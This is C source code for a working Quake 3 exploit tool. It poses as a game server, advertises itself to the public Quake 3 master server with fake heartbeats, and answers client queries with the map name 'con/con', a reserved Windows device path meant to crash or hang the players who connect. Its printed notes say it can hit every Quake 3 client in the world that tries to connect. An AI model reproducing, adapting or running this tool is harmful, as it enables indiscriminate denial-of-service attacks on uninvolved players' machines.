#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "show_dump.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define    close    closesocket
    #define sleep   Sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif



#define VER             "0.1"
#define BUFFSZ          2048
#define PORT            27960
#define MASTERSERVER    "master.quake3arena.com"
#define MSPORT          27950
#define HEARTBEAT       "\xff\xff\xff\xff" \
                        "heartbeat QuakeArena-1"
#define PROTOCOL        "68"    /* 68 is the protocol for Quake 3 1.32 */



/* QUERIES */
#define STAT    "getstatus"
#define INFO    "getinfo"
#define CHALL   "getchallenge"
#define CONN    "connect"
#define RCON    "rcon"
#define DISC    "disconnect"



/* ANSWERS */
#define STAT1   "\xff\xff\xff\xff" \
                "statusResponse\n" \
                "\\sv_punkbuster\\0" \
                "\\capturelimit\\0" \
                "\\g_blueTeam\\Pagans" \
                "\\g_redTeam\\Stroggs" \
                "\\sv_floodProtect\\1" \
                "\\sv_maxPing\\0" \
                "\\sv_minPing\\0" \
                "\\sv_maxRate\\0" \
                "\\sv_hostname\\hostname" \
                "\\g_maxGameClients\\0" \
                "\\sv_maxclients\\8" \
                "\\timelimit\\0" \
                "\\fraglimit\\50" \
                "\\dmflags\\0" \
                "\\version\\Q3 1.32 linux-i386 Oct  7 2002" \
                "\\g_gametype\\0" \
                "\\protocol\\68" \
                "\\mapname\\Q3DM1" \
                "\\sv_privateClients\\0" \
                "\\sv_allowDownload\\0" \
                "\\bot_minplayers\\0" \
                "\\gamename\\baseq3" \
                "\\g_needpass\\0.0 0 \"TEST\"\n"

#define INFO1   "\xff\xff\xff\xff" \
                "infoResponse\n" \
                "\\punkbuster\\0" \
                "\\pure\\1" \
                "\\gametype\\0" \
                "\\sv_maxclients\\8" \
                "\\clients\\1" \
/* con/con > */ "\\mapname\\con/con" \
                "\\hostname\\hostname" \
                "\\protocol\\" PROTOCOL \
                "\\challenge\\%s"

#define CHALL1  "\xff\xff\xff\xff" \
                "challengeResponse 1234567890"

#define CONN1   "\xff\xff\xff\xff" \
                "connectResponse"

#define RCON1   "\xff\xff\xff\xff" \
                "print\n" \
                "No rconpassword set on the server.\n"

#define DISC1   "\xff\xff\xff\xff" \
                "print\n" \
                "Fuck you! 8-)\n"



u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    int        sd,
            err,
            peerlen;
    struct    sockaddr_in    peerc,
                peers;
    unsigned char    buffsend[BUFFSZ],
            buff[BUFFSZ],
            *stri,
            heart = 1;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(2,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "Quake 3 con/con exploit + heartbeat emulator "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc > 1) {
        if(argv[1][0] == '0') {
            fputs("\nWill NOT be used the heartbeat emulator\n",
                stdout);
            heart = 0;
        }
    } else {
        fputs("\nNOTE:\n"
        "The exploit will directly use the heartbeat emulator so your host will\n"
        "be seen by all the Quake 3 clients in the world and you can use this\n"
        "exploit versus eachone that will try to connect to you.\n"
        "USE a command-line argument equal to 0 (zero) for turn off the heartbeat\n"
        "option (useful if you wanna test the exploit in LAN).\n"
        "\n"
        "For example:\n"
        "\n"
        "./q3concon 0\n"
        "\n"
        "\nPress RETURN to continue or CTRL-C to kill the exploit and turn off the option\n"
        "\n", stdout);

        fgetc(stdin);
    }

    /* MasterServer */
    if(heart) {
        peerc.sin_addr.s_addr = resolv(MASTERSERVER);
        peerc.sin_port        = htons(MSPORT);
        peerc.sin_family      = AF_INET;

        printf("\nMasterServer: %s:%d\n", MASTERSERVER, MSPORT);
    }

    /* BIND */
    peers.sin_addr.s_addr = INADDR_ANY;
    peers.sin_port        = htons(PORT);
    peers.sin_family      = AF_INET;

    peerlen               = sizeof(peerc);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    printf("\nBinding UDP port %u\n\n", PORT);
    err = bind(sd, (struct sockaddr *)&peers, peerlen);
    if(err < 0) std_err();

    if(heart) {
        fputs("Sending the default 2 heartbeats to the Master Server\n", stdout);
        err = sendto(sd, HEARTBEAT, sizeof(HEARTBEAT) - 1, 0,
            (struct sockaddr *)&peerc, peerlen);
        if(err < 0) std_err();
        err = sendto(sd, HEARTBEAT, sizeof(HEARTBEAT) - 1, 0,
            (struct sockaddr *)&peerc, peerlen);
        if(err < 0) std_err();

        fputs("NOTE: Heartbeats should be sent every 5 minutes (as each Quake 3 server does), however I have seen that if you send only ONE heartbeat the Quake 3 clients in the world will contact you for very very long time (probably more than one hour). This could be a great problem and I don't know why it happens, so this exploit uses only the 2 default heartbeats because the effect seems to be the same\n", stdout);
    }

    while(1) {
        err = recvfrom(sd, buff, BUFFSZ, 0,
            (struct sockaddr *)&peerc, &peerlen);
        if(err < 0) std_err();
        buff[err] = 0;

        printf("%s:%d = ", inet_ntoa(peerc.sin_addr),
                ntohs(peerc.sin_port));

        /* --- */
        /* I have used strstr because Medal of Honor has a byte between */
        /* \xff\xff\xff\xff and the query */

        if(strstr(buff + 4, STAT)) {
            fputs("GETSTATUS\n", stdout);
            sendto(sd, STAT1, sizeof(STAT1) - 1, 0,
                (struct sockaddr *)&peerc, peerlen);
            continue;
        }

        /* I use stri for the master server that doesn't send "xxx" but */
        /* sends an unique ID number */

        stri = strstr(buff + 4, INFO);
        if(stri) {
            fputs("GETINFO\n", stdout);
            stri += sizeof(INFO);
            if(memcmp(stri, "xxx", 3)) {
                fputs("MasterServer query\n", stdout);
            }
            err = snprintf(buffsend, BUFFSZ, INFO1, stri);
            sendto(sd, buffsend, err, 0,
                (struct sockaddr *)&peerc, peerlen);
            continue;
        }

        if(strstr(buff + 4, CHALL)) {
            fputs("GETCHALLENGE\n", stdout);
            sendto(sd, CHALL1, sizeof(CHALL1) - 1, 0,
                (struct sockaddr *)&peerc, peerlen);
            continue;
        }

        if(strstr(buff + 4, CONN)) {
            fputs("CONNECT\n", stdout);
            sendto(sd, CONN1, sizeof(CONN1) - 1, 0,
                (struct sockaddr *)&peerc, peerlen);
            continue;
        }

        if(strstr(buff + 4, RCON)) {
            fputs("RCON\n", stdout);
            sendto(sd, RCON1, sizeof(RCON1) - 1, 0,
                (struct sockaddr *)&peerc, peerlen);
            continue;
        }

        if(strstr(buff + 4, DISC)) {
            fputs("DISCONNECT\n", stdout);
            sendto(sd, DISC1, sizeof(DISC1) - 1, 0,
                (struct sockaddr *)&peerc, peerlen);
            continue;
        }

        fputs("Unknown data:\n", stdout);
        show_dump(buff, err, stdout);
/*
        fputs("\nnow exit\n\n", stdout);
        break;
*/
    }

    close(sd);
    return 0;
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

